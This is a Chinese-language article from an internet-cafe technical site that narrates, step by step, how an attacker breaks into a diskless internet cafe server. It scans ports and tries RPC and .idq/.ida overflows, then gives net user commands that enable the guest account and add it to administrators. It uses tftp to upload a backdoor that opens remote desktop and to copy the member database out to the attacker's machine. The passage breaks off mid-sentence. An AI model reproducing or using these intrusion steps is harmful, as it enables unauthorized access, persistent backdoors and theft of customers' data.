在天下网吧-技术网管-网吧天下栏目上一篇文章中，我们看到了：

上一篇文章： 木马病毒是如何进入网吧程序的

希望对各位网吧网管或者网吧维护，做网吧系统的各位大大有用，那么今天我们一起来看下：看看黑客是怎么入侵无盘网吧服务器的

　　无盘网吧的运行机制是通过服务器的资源映射到客户端，网吧机器的所有资源都来源于服务器，如果黑客入侵网吧服务器，那么病毒的感染building影响到整个网吧的客户端。作为网吧热点，小编与大家分享一下黑客入侵网吧服务器的过程。
　　一、确定目标
　　首先要确定要攻击的目标，即网吧服务器的IP是多少。我所在网吧的客户机装的是Windows98+万象2003，估计服务器应该是Windows2k以上，用SuperSCan3.0扫了一下192.168.0.1~192.168.0.254这个范围的135端口确实只有一台服务器没有错，目标确定。
　　二、开始入侵
　　既然服务器开了135端口，那么先用RPC服务缓冲区溢出漏洞溢出工具“RPCExploitGUI”试试看，选择目标为win2k（ALL）和winxp（ALL）都没有成功，或许是打了补丁，也可能是借助天网防火墙之类的对135端口做了限制。打开SuperSCan，扫了一下192.168.0.100（刚才扫出的服务器内部IP地址）的“1~500”端口。
　　结果显示服务器开了21（ftp），80（http），135（LocationService），139（NetBIos），445（MicROSoft-DS）端口，在IE地址栏内输入"ftp://192.168.0.100",有个共享目录Backup，打开浏览了一遍。
　　返回SuperSCan，可以看到结果栏里显示服务器用的是IIS5.1，可以确定目标服务器用的是WindowsXP，看来用Webdavx溢出XP的机子是没希望了，用X-SCan扫描服务器网页，报告发现.idq/.ida映射的溢出漏洞。
　　先做个账号，这要用到几条命令：（括号内为注解，不要输入）
　　netuserguest/active:yes（启用账户guest）
　　netuserguest12345（把账户guest的密码设为12345）
　　netlocalgroupadministrators/addguest（把账户guest加到administrators组，具有最高权限，默认为Guests组）
　　回到溢出shell，把djxyxs.exe传到服务器，执行“tftp-i192.168.0.50getdjxyxs.exeC:windowssystemdjxyxs.exe，传过来了，再执行“djxyxs”程序，对方的3389端口就要开了。
　　后门制作好了以后，来窃取服务器的会员数据库(这是本文的重点)，服务端一般是被装在C盘的Octopus目录下，执行“tftp-i192.168.0.50putOct2003.mdbc:octopusOct2003.mdb”，一盏茶的功夫，数据库下载过来了，但是怎么打开呢。
　　可以用Excel，但网吧里不会装这种玩意，记得服务器的共享目录Backup里有个